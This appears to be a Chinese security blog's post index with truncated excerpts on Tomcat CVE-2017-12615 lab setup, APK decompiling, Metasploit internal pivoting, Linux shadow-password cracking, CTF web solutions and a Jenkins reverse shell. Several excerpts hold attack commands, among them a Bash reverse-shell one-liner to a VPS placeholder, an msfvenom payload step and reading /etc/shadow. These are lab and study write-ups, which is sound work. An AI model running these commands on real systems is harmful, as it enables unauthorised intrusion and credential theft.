CVE-2017-12615 环境搭建 使用VulHub搭建漏洞环境，进入/tomcat/CVE-2017-12615目录，下发以下命令启动环境 sudo service docker start //若没启动docker先启动服务 docker-compose up -d 访问 http://ip:8080/，如图所示环境搭建成功 漏洞复现 漏洞…

前言 本文使用Android软件安全权威指南第二章的程序。将程序使用Android Studio编译打包生成APK程序。 ApkTool反编译 ApkTool手册及常用命令 执行命令apktool d .\AndCrakeMe1.apk -o AndCrakeMe1，在AndCreakeMe1目录下生成反编译文件。其中，res目录存放的是程序的资源…

实验环境: 攻击机：kali 192.168.144.217 靶 机: 外网机： 外网网卡：192.168.144.147 内网网卡：192.168.52.143 域控：192.168.52.138 内网机win7：192.168.52.99 Metasploit内网代理 在已获得外网机shell的情况下，上传msf马反弹会话 msfvenom -…

首先了解下linux系统密码的构成。以root权限下发cat /etc/shadow,用户名之后的第两个冒号之间是密码。密码由三部分组成。第一部分，前两个$符之间是加密方式，其中1代表是MD5加密，5代表SHA256加密，6代表SHA512加密。第二部分，后两个$之间是盐值。第三部分，第三个$之后为密码。 import crypt crypt.cr…

WEB [ACTF2020 新生赛]Include 伪协议：/?file=php://filter/read=convert.base64-encode/resource=flag.php,将读取的字符串base64解密 [极客大挑战 2019]Secret File 查看网页源代码，发现链接“/Archive_room.php”。访问后点击“se…

处理器主要有四种架构：x86系列/Atom处理器，ARM系列，MIPS系列 ，PowerPC系列，以及RISC-V系列。首先分清楚处理器架构与处理器的区别。架构如同地基，处理器则是地基上的高楼大厦。主流架构只有几种，但CPU却有成千上万种。一些公司如ARM，自己不生产芯片，只是授权给厂商架构专利去开发处理器。在RAM这个地基上，是开发出东方明珠，还…

Bash反弹 1.在vps上新建文件，写入bash反弹shell一句话，并起web服务。 #bash反弹shell一句话 vim poc: bash -i >& /dev/tcp/vpsip/port 0>&1 #起web服务 Pyhto3 -m http.server 8080 2.下载poc到Jenkins服务器 p…